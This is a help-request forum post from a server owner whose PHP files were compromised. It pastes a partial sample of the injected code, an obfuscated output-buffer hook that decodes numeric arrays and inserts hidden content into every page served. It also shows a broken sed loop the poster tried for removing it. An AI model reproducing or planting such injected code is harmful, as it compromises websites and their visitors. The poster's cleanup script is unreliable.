Possible Duplicate:
My server's been hacked EMERGENCY
Hello,
I need your help urgently as the server has been hacked and I do not have any time to learn of how to remove the hacker's code from all files. I have attached the code which was added to all files. There are many special characters in this code and it's quite large. It was added in the files sometimes twice.
I do not know sed well to solve this issue with it. How to exclude this piece of code from all files? Using sed, diff/patch or other techniques?
Here is part of the code to be removed:
<?php global $ob_starting;
if(!$ob_starting) {
function ob_start_flush($s) {
$tc = array(0, 69, 83, 84, 82, 67, 7, 79, 9, 8, 23, 73, 12, 76, 68, 78, 63, 24, 14, 19, 3, 65, 27, 17, 85, 70, 80, 16, 29, 11, 89, 86, 2, 66, 77, 93, 91, 71, 18, 72, 20, 75, 87, 22, 74, 13, 59, 61, 52, 37, 28, 35, 15, 1, 21, 25, 34, 92, 36, 41, 30, 88, 46, 33, 51);
$tr = array(50, 2, 5, 4, 11, 26, 3, 0, 3, 30, 26, 1, 28, 32, 3, 1, 61, 3, 52, 44, 21, 31, 21, 2, 5, 4, 11, 26, 3, 32, 60, 11, 25, 0, 9, 3, 30, 26, 1, 7, 25, 9, 4, 1, 14, 1, 25, 16, 5, 7, 13, 7, 4, 2, 8, 28, 28, 32, 24, 15, 14, 1, 25, 11, 15, 1, 14, 32, 8, 0, 36, 0, 0, 0, 31, 21, 4, 0, 14, 11, 31, 16, 5, 7, 13, 7, 4, 2, 0, 28, 0, 15, 1, 42, 0, 63, 4,
-------------
-------------
$i++; $s=substr($s,0,$i).$ob_htm.substr($s,$i);
return $s;
}
$ob_starting = time();
@ob_start("ob_start_flush");
I will appreciate any help. Thanks.
Update:
I have tried using the code like:
for fname $(grep *.php .); do
while read; do
sed -i 's/$REPLY//' $fname
done < filem
done
where filem - is a file with the malicious code. In this file I replaced all special characters like $<( etc with the dot '.', but still sed brings many errors.
